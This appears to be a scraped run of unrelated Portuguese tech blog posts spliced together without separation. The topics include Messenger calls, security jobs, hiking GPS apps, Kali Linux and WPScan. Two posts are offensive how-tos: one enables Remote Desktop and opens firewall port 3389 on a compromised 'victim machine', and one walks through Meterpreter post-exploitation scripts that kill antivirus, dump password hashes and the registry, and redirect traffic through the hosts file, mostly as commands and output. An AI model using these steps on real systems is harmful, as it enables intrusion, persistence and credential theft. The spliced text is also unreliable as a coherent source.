O recurso de ligações via Wi-Fi ou 3G/4G através do Facebook usando o app Messengerpara iOS e Android já estava disponível desde janeiro em alguns países. Agora, está disponível no Brasil. Já apareceu aí no seu?
Não é preciso atualizar o app, basta ter a última versão (disponível na App Store e no Google Play). Para ver se o recurso está habilitado, clique em algum contato e depois no “i” do canto superior direito.
Se sim, aparecerá a opção de realizar a chamada, “Ligação gratuita”. Apenas clique e espere o contato atender. Há relatos, ainda não confirmados, de que a opção só surja para quem cadastro o número do celular no perfil da rede social — quem não está apto ganha um botão cinza/inativo. Outra exigência é que o botão só aparece funcional se as duas pessoas tiverem a última versão do app.
Note que existe um monte de “se”, e para piorar o app não tem um filtro que facilite a descoberta de quem está habilitado para conversar. O jeito é clicar de contato em contato e ver se a opção aparece ali. Nada conveniente, mas um esforço válido na hora de economizar com voz, ou falar com alguém que você não tenha o número.
Ultrapassadas essas barreiras, porém, a qualidade da ligação é boa. Nos rápidos testes que fizemos aqui, notamos um chiado no início, mas algo bem rápido e que, em seguida, some e dá lugar a vozes bastante claras e fáceis de compreender. Nos testes com o 3G da Vivo em Niterói (valeu, Felipe!) a qualidade se manteve, então nesse ponto (qualidade de voz) não há muito do que reclamar.
Eu, porém, pareço não estar dando muita sorte. Não sei se é alguma zica com minha conexão ou com o smartphone, mas 1) não consigo fazer chamadas, só receber; e 2) elas caem após ~30 segundos. Ou talvez seja algum problema com o Facebook. Testei com três pessoas e, com todas elas os mesmos sintomas se manifestaram. Pedi ao Felipe e outros amigos que verificassem se esse problema da queda após 30s se repetia, e com eles não aconteceu. O que foi que eu te fiz pra merecer isso, Zuck?
A demanda por especialistas de segurança da informação nos Estados Unidos e em outros mercados como o Brasil está superando a oferta disponível. No Brasil a carência por esses talentos é um reflexo da falta de profissionais qualificados para atuar em diversas áreas em TI.
Relatório divulgado pela Burning Glass Technologies, empresa americana que desenvolve soluções para comparar as ofertas de profissionais com oportunidades no mercado de trabalho, mostra que a demanda por especialistas em segurança cibernética cresceu 3,5 vezes mais que a procura por talentos de TI em geral e 12 vezes mais do que todos as outras vagas de emprego.
A conclusão da Burning Glass é baseada em um estudo que avaliou ofertas de empregos para os profissionais de segurança cibernética em empresas de diversos segmentos da economia e agências do governo dos Estados Unidos nos últimos cinco anos.
De acordo com a empresa, em 2012 havia mais de 67,4 mil vagas para profissionais de segurança cibernética distribuídas por companhias de diversos segmentos da economia, incluindo empresas de defesa, setor financeiro, saúde, varejo e serviços profissionais. Esse número é 73% maior do que o número das posições ofertados em 2007, segundo a pesquisa da Burning Glass.
Em comparação, o número de ofertas para profissionais de TI de todas as áreas cresceu cerca de 20% entre 2007 e 2012, enquanto as vagas de empregos em geral aumentaram apenas 6% durante o período.
Os dois talentos de segurança mais cobiçados pelos empregadores eram engenheiros de segurança da informação e analistas de segurança.
Uma em cada três vagas ofertadas para profissionais nessa área era para os engenheiros de segurança da informação. Quase 25% das oportunidades foram para analistas de segurança.
Matt Sigelman, CEO Burning Glass Technologies, avalia que a crescente demanda por profissionais de segurança da informação indica que as empresas e agências governamentais estão investindo mais dinheiro e esforço para proteger seus dados contra ataques.
Entretanto, o executivo afirma que a maior preocupação é saber se há oferta de talentos o suficiente para atender a demanda das empresas em razão do aumento de exigências para contratação desse tipo de mão de obra.
Exigência de certificação
Por exemplo, nos últimos dois anos, a maior parte das vagas exige que os candidatos tenham o Certified Information Systems Security Professional (CISSP), que saltou de 19 mil para mais de 29 mil credenciados.
Outra indicação da dificuldade crescente de empregadores norte-americanos de encontrar profissionais de segurança da informação qualificados são os anúncios de emprego. Eles geralmente levam 35% a mais do tempo que normalmente levariam para achar talentos de TI na hora de encontrar especialistas de segurança.
Julie Peeler, diretora da Fundação ISC2, que desenvolve programa CISSP, afirma que não há dúvida de que a crescente demanda está superando a oferta de especialistas em segurança.
Para o próximo ano, a executiva estima que haverá a necessidade de mais 330 mil profissionais de segurança em todo o mundo. O problema é que a quantidade de jovens talentos que estão saiado anualmente da faculdade não atende a demanda do mercado, informa Julie.
Uma pesquisa recente da Fundação ISC2 com cerca de 12 mil profissionais de segurança da informação em todo o mundo constatou que a escassez de talentos nessa área tem gerado impacto dramático sobre a capacidade das organizações de defesa contra ataque ou de se recuperar rapidamente de invasões cibernéticas.
“[A escassez] está causando uma pressão sobre a força de trabalho existente”, diz Julie. “Eles estão tendo que trabalhar mais e mais horas.”
A crescente escassez fez com que os salários para os profissionais de segurança da informação aumentassem em comparação com muitos outros cargos de TI.
De acordo com a Burning Glass, a média de salário para profissionais de segurança da informação em 2012 era 100,7 mil dólares contra 89,2 mil dólares por ano para outros talentos de TI.
Especialistas com certificações de segurança ganham um salário modestamente mais elevado, de acordo com estudo da Burning Glass. Em muitos casos, as empresas exigem essas credenciais como uma maneira de filtrar os candidatos com conhecimento comprovado dos que não são experientes.
“A demanda é alta, mas não há oportunidade para todos”, informa Roger Cressey, vice-presidente sênior da Booz Allen Hamilton.
Embora seja verdade que os empregadores estão procurando mais profissionais de segurança da informação, eles só querem talentos com muita experiência em áreas como a segurança de rede, governança, políticas e procedimentos. “Você tem que ter as habilidades exigidas” afirma o consultor.
Cressey observou que as universidades dos Estados Unidos, hoje, não estão treinando pessoas o suficiente para lidar com a demanda explosiva por especialistas em segurança de TI. A realidade do Brasil não é muito diferente.
Algumas pessoas tem me perguntado sobre aplicativos para smartphone/tablet que sejam capazes de marcar e exportar o tracklog das trilhas que eles venham a fazer por aí. Então eu resolvi buscar alguns programas que possuem essas funções de fazer o track das trilhas, bom como outras funções – tanto no Android quanto no IOS. Uma coisa que é importante citar é que nem sempre os telefones conseguem receber bem o sinal do GPS quando estão sob vegetação mais fechada ou mesmo em dias de tempo ruim, o que pode inutilizar o app dependendo do local onde você vai caminhar.
Separei alguns apps que encontrei em pesquisas no Google e nas app stores. Alguns eu conheço, como oMaverick, GPS Essentials e o My Topo Maps para Android – inclusive já usei alguns deles. Não sei como são os apps para IOS (iPhone), mas escolhi os que tinham boas funções e avaliações positivas.
O destaque, na verdade “os destaques”, para iPhone são os três apps – todos com funções boas. Já para Android os que merecem destaque são o GPS Essentials, o Maverick e o My Topo Maps. Outra opção interessante para quem já usa o site é o app do “Wikiloc”, também para Android.
1. Apps para tracklog/GPS iPhone
Como eu citei antes os apps para o IOS não foram testados, me baseei apenas na avaliação e funções úteis deles.
1.1 – GPS KIT
O app trabalha com arquivos KML, KMZ e GPX o que permite uma integração com o Google Earth e o TrackMaker, bem como permite compartilhamentos no Facebook e Twitter. Tem bússola digital, permite segir de um waypoint para outro usando a bússola, informações sobre velocidade média, ritmo e distância, entre outras informações. Segundo o desenvolvedor o GPS Kit usa a máxima precisão do GPS para um track mais eficiente, mesmo em locais onde o sinal da operadora de telefonia não existe.
O Maps 3D, como o nome já diz, tem o diferencial de mostrar a rota sobre uma imagem em 3D – o que do ponto de vista da navegação e do planejamento da trip pode ser muito interessante! O app permite descarregar os mapas através de wi-fi ou 3G e usá-los posteriormente sem a presença de uma conexão de dados, o que é o normal em ambiente outdoor. Ele permite compartilhar os tracks via Twitter e Facebook, marcar waypoints e pontos de interesse (POIs), mostra informações sobre distância, velocidades, altitude e o quanto falta percorrer, entre outras funções!
Exporta e importa GPX, exibe informações sobre distância, altitude e velocidade, faz a gravação do track sem precisar de internet (porém para exibir o mapa é necessário uma conexão – ponto ruim do app), exibe as distâncias em kilômetros ou milhas, permite editar waypoints diretamente no mapa, etc. O ruim dele é esta questão de não trabalhar com mapas offline, infelizmente!
Esse foi um app que eu gostei muito! Principalmente por ajudar no planejamento de trilhas mostrando o mapa topográfico do local e por marcar com latitude e longitude um ponto qualquer no mapa. A versão PRO (paga) permite armazenar mapas para consulta offline. Um diferencial interessante é que ele permite sobrepor o mapa topográfico com um com imagens de satélite, permitindo uma melhor “leitura” do terreno, como mostra a imagem abaixo:
Note que existe um cursor em forma de cruz que pode ser posicionado para determinar a latitude/longitude de um ponto no mapa
É possível marcar e identificar waypoints no mapa, bem como localizar um ponto através da sua latitude/longitude, bem como marcar dois pontos e determinar a distância entre eles (em linha reta). O mesmo desenvolvedor tem outro app chamado “Trimble Outdoors Navigator“, igualmente gratuito e que permite a gravação das rotas usando o GPS do aparelho celular/tablet.
O Maverick é um dos melhores aplicativos para mapas e GPS do sistema Android, pelo menos na minha opinião, ele permite a gravação de tracklogs em GPX, compartilhamento da posição atual ou planejada nas redes sociais, informa uma série de dados (altitude, dados de velocidade, latitude/longitude e bússola), possui uma série de mapas diferentes com um destaque para o mapa de transportes urbanos que pode ajudar os viajantes a se acharem e o mapa para ciclistas que mostra as lojas de bike por perto. É um app bem completo realmente, vale um teste!
Mapa de transportes públicos do Maverick, marcando algumas linhas de ônibus da orla carioca e as estações de metrô
Detalhe interessante um mapa para ciclistas que mostra as ciclovias e lojas de bike ao redor (ícones amarelos).
Útil para quem já usa o site do Wikiloc.com, este app de mesmo nome permite acompanhar sua trip no mapa, incluir fotos e gravar o tracklog da trip no seu aparelho, bem como compartilhar o material no Facebook ou no Wikiloc.com. Vale o teste para quem curte o portal, eu não usei.
Outro canivete suíço do Android quando o assunto é GPS, tracklog e afins. Disponibiliza uma série de informações úteis – latitude, longitude, velocidades, número de satélites, horários do nascer e pôr do sol, fase da lua e muito mais! Permite marcar waypoints, gravar tracklogs, ver gráficos, adicionar fotos… A interface é bem simples, mas funcional – permite exportar os dados para KML ou GPX e inclusive fazer o upload para o Dropbox. Aceita a importação de arquivos em KML. Vale muito um teste.
Este o pessoal do trekking Brasil n comentou, é uma dica minha mesmo! Este eu uso, e posso garantir: Muito bom! Fácil de mexer.
O Google liberou uma nova versão de seu aplicativoMinhas Trilhas (também conhecido como “Os Meus Percursos”) para Android. Com uma interface totalmente renovada, o app oferece um modo fácil de gravar e compartilhar trajetos via GPS.
“Minhas Trilhas registra o seu caminho, velocidade, distância e altitude, enquanto anda, corre, anda de bicicleta ou faz qualquer outra atividade ao ar livre. Durante a gravação, você pode visualizar os seus dados ao vivo, anotar o trajeto e ouvir anúncios de voz periódicos sobre seu progresso”, explicou o buscador.
Além de contar com suporte a versão 4.0 do Android, o Minhas Trilhas também apresenta integração com o Google+, Facebook e Twitter. Você ainda pode adicionar seus dados no Google Maps e Tabela (Beta) do Google Drive e Docs.
Caso você tenha interesse em registrar mais dados, por exemplo, frequência cardíaca, o aplicativo traz suporte a sensores biométricos de terceiros, como o Zephyr HXM e Polar Wearlink, ambos com tecnologia Bluetooth.
Vou adiantando que o tutorial está em Inglês, não tive saco pra traduzir rsrsrss.
Type : Tips and Trick
Level : Easy
There’s a lot of people while learn computerhacking, they didn’t like command prompt or a terminal too much. Some of them prefer quick and fast hacking with a nice and friendly interface that just click here and click there then it finished .
Today I will wrote tips and trickhow to enable remote desktop using command prompt… (hey! it’s still usecommand prompt!)..but wait, this command prompt all you need just to copy and paste and execute it. You can execute the command in this tutorial from Telnet or Shell you got from compromised system, etc.
You can view my last two tutorial to help you much more understand this tips and trick :
Let’s prepare the easy and simple tips and trickhow to enable remote desktop using command prompt.
Requirements :
1. Telnet [or] Command Prompt –> with administrative rights
Step by Step :
1. This tips and trick I will continue from the tutorial about Creating Simple Exploit using Metasploit. So in this case you already got the shell or the command prompt.
2. Type this command to enable Remote Desktop on victim machine :
3. This step have not finished yet….we need to start the Terminal Service, because terminalservice was disabled by default
sc config TermService start= auto
that command will make terminalservice will start every time the computer started.
4. Now we need to start the terminalservice for use right now, because the command on step 4 only to maketerminalservice started every computer started and does not start the service.
net start Termservice
5. Okay everything already done, and we’ve almost done. The next step we need to open port that will be used by remote desktop on firewall, so the alert will not popping up while someone connect to remote desktop server.
The command above will make firewall accepted every packet that came to port 3389 that used for Remote Desktop without alert.
6. Open a new terminal (Backtrack 5) or you can use Remote Desktop Client in Windows(Start –> All Programs –> Accessories –> Remote Desktop Connection). In this tips and trick I will use RDesktop in Backtrack 5 R2.
rdesktop 192.168.8.92
7. A GUI (Graphical User Interface) will pop out ask for user name and password.
8. Yes we’re in and successfully enable the remote desktop.
Hope it’s useful m8
FYI :
– You can add the user via command prompt by following this tutorial about how to add user with administrative rights via command prompt (click here).
Metasploit vem com uma tonelada de scripts úteis que podem ajudar você no Metasploit Framework. Esses scripts são normalmente feitas por terceiros e eventualmente adotada para o repositório de subversão. Nós vamos passar por alguns deles e orientá-lo como você pode usá-los em seu próprio teste de penetração.
Os scripts abaixo mencionados destinam-se a ser utilizado com um invólucro Meterpreter após o ataque com êxito de um alvo. Depois de ter ganho uma sessão com o alvo que você pode utilizar estes scripts para melhor atender às suas necessidades.
checkvm
The ‘checkvm’ script, as its name suggests, checks to see if you exploited a virtual machine. This information can be very useful.
meterpreter > run checkvm
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
getcountermeasure
The ‘getcountermeasure’ script checks the security configuration on the victims system and can disable other security measures such as A/V, Firewall, and much more.
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection 6 firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*]
[*] Checking DEP Support Policy...
getgui
The ‘getgui’ script is used to enable RDP on a target system if it is disabled.
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p
OPTIONS:
-e Enable RDP only.
-h Help menu.
-p The Password of the user to add.
-u The Username of the user to add.
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
get_local_subnets
The ‘get_local_subnets’ script is used to get the local subnet mask of a victim. This can be very useful information to have for pivoting.
meterpreter > run get_local_subnets
Local subnet: 10.211.55.0/255.255.255.0
gettelnet
The ‘gettelnet’ script is used to enable telnet on the victim if it is disabled.
meterpreter > run gettelnet
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u -p
OPTIONS:
-e Enable Telnet Server only.
-h Help menu.
-p The Password of the user to add.
-u The Username of the user to add.
meterpreter > run gettelnet -e
[*] Windows Telnet Server Enabler Meterpreter Script
[*] Setting Telnet Server Services service startup mode
[*] The Telnet Server Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
hostsedit
The ‘hostsedit’ Meterpreter script is for adding entries to the Windows hosts file. Since Windows will check the hosts file first instead of the configured DNS server, it will assist in diverting traffic to a fake entry or entries. Either a single entry can be provided or a series of entries can be provided with a file containing one entry per line.
meterpreter > run hostsedit
OPTIONS:
-e Host entry in the format of IP,Hostname.
-h Help Options.
-l Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt
meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
[*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
[*] Clearing the DNS Cache
killav
The ‘killav’ script can be used to disable most antivirus programs running as a service on a target.
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
remotewinenum
The ‘remotewinenum’ script will enumerate system information through wmic on victim. Make note of where the logs are stored.
meterpreter > run remotewinenum
Remote Windows Enumeration Meterpreter Script
This script will enumerate windows hosts in the target environment
given a username and password or using the credential under witch
Meterpreter is running using WMI wmic windows native tool.
Usage:
OPTIONS:
-h Help menu.
-p Password of user on target system
-t The target address
-u User on the target system (If not provided it will use credential of process)
meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128
[*] Saving report to /root/.msf3/logs/remotewinenum/10.211.55.128_20090711.0142
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
scraper
The ‘scraper’ script can grab even more system information, including the entire registry.
meterpreter > run scraper
[*] New session on 10.211.55.128:4444...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)
From our examples above we can see that there are plenty of Meterpreter scripts for us to enumerate a ton of information, disable anti-virus for us, enable RDP, and much much more.
winenum
The ‘winenum’ script makes for a very detailed windows enumeration tool. It dumps tokens, hashes and much more.
meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 10.211.55.128:4444...
[*] Saving report to /root/.msf3/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -nao
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
[*] running command net accounts /domain
[*] running command net session
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net localgroup administrators
[*] running command net group administrators
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] running command tasklist /m
[*] running command gpresult /SCOPE COMPUTER /Z
[*] running command gpresult /SCOPE USER /Z
[*] Running WMIC Commands ....
[*] running command wmic computersystem list brief
[*] running command wmic useraccount list
[*] running command wmic group list
[*] running command wmic service list brief
[*] running command wmic volume list brief
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic netclient list brief
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic share get name,path
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic process list brief
[*] running command wmic startup list full
[*] running command wmic rdtoggle list
[*] running command wmic product get name,version
[*] running command wmic qfe
[*] Extracting software list from registry
[*] Finished Extraction of software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
Para aqueles usuários do navegador Google Chrome que trabalham pesquisando produtos ou conteúdo e diversos sites ao mesmo tempo, e que geralmente permanecem a maior parte do tempo com várias abas abertas, encontramos uma solução prática e eficiente, a extensão OneTab.
Com dois cliques é possível adicionar a extensão (gratuita) no navegador. Com ela instalada basta clicar no botão da extensão que permanece sempre ativa ao lado da barra de endereços do navegador para que ela agrupe todas as janelas abertas de uma vez só em uma única aba. Ajuda a economizar até 95% de memória do seu computador evitando que ele fique sobrecarregado com tantas abas abertas. Dentro desta única aba criada por ele você encontra todas as outras abas agrupadas e por ela é possível abrir novamente a aba que deseja ou excluir aquela que não vai mais utilizar, ou ainda restaurar ou fechar todas de uma só vez.
Simples e prático, super recomendamos! Baixe a extensão no site da OneTab.
Eu adoro controles com captura de movimento, e fico feliz quando vejo uma empresa inovando nesta área. É o caso do Thalmic Labs e seu MYO, um acessório que você prende no antebraço para detectar os impulsos elétricos diretamente dos seus músculos de forma instantânea, e assim e comandar seu computador, smartphone ou tablet.
O sistema dispensa câmeras ou sensores e permite que você programe certas ações para alguns gestos, o que gera possibilidades muito interessantes para jogos e controle remoto de veículos, como você pode ver no vídeo no final deste post.
O MYO tem uma API disponível para desenvolvedores criarem novas maneiras de interação com a tecnologia. Saiba mais sobre o MYO.
Backtrack é um dos mais amplamente utilizados no campo da pentesting. A distribuição vem com uma série de ferramentas que usamos para fazer nosso teste de penetração.
Tem havido várias versões de retorno, o último é 5 R3. Mas não vao publicar um Backtrack 6, já decidiu mudar o nome e colocar outro sistema de distribuição como base. Se Backtrack R3 5 foi baseado no Ubuntu, Kali , o nome da nova versão é baseada em Debian .
Eu tenho instalado para testá-lo, a verdade é que a experiência até agora tem sido muito positivo.
O sistema conta com diversas novas ferramentas.
Kali Linux é baseado em Debian Linux, em vez de novos repositórios do Ubuntu e simplificados sincronizar com os repositórios do Debian 4 vezes ao dia, sempre oferecendo aos usuários com as últimas atualizações de pacotes e correções de segurança disponíveis.
Outra grande característica introduzida é que, por causa do sistema Debian compatível, ele agora é capaz de Bootstrap uma Kali Instalação / ISO diretamente do Kali repositórios. Isso permite que qualquer usuário facilmente construir sua própria personalização de Kali, bem como executar instalações de rede da empresa a partir de um repositório local ou remoto.
A Kali Linux trabalha com folga em ARM Samsung Chromebook, Pi Raspberry, U2 ODROID / X2 e SainSmart SS808.
Com mais de 300 ferramentas de testes de penetração, completamente livre, open source, suporte a dispositivos sem fio Vast, GPG assinado pacotes e acordos de recompra, multi-linguagem, Totalmente personalizável fazer essa distribuição uma das melhores obra-prima disponível de comunidade de hackers.
Mais uma vez, a senha de root padrão é “toor” mesmo, você pode fazer o download Kali Linux aqui.
WPScan para Android é mais uma ferramenta que comprovam que o Android é o sistema operacional para celulares que transforma estes aparelhos em verdadeiros computadores.
Para quem não sabe, o wpscan é uma ferramenta dedicada para análise de vulnerabilidade em sites ou blogs que utilizem o wordpress.
Perdi a conta da quantidade de ferramentas e funcionalidades existentes para android e que ajudam analistas de segurança em suas pesquisas.
WPSCan para Android em ação
Daqui a pouco, um analista de segurança só precisará de um simples celular com android, e algumas ferramentas, para saber se aquele site ou empresa estão vulneráveis.
Pré-requisito para rodar a ferramenta acima é ??? Possuir um aparelho celular que rode android.. Há vá ?!?!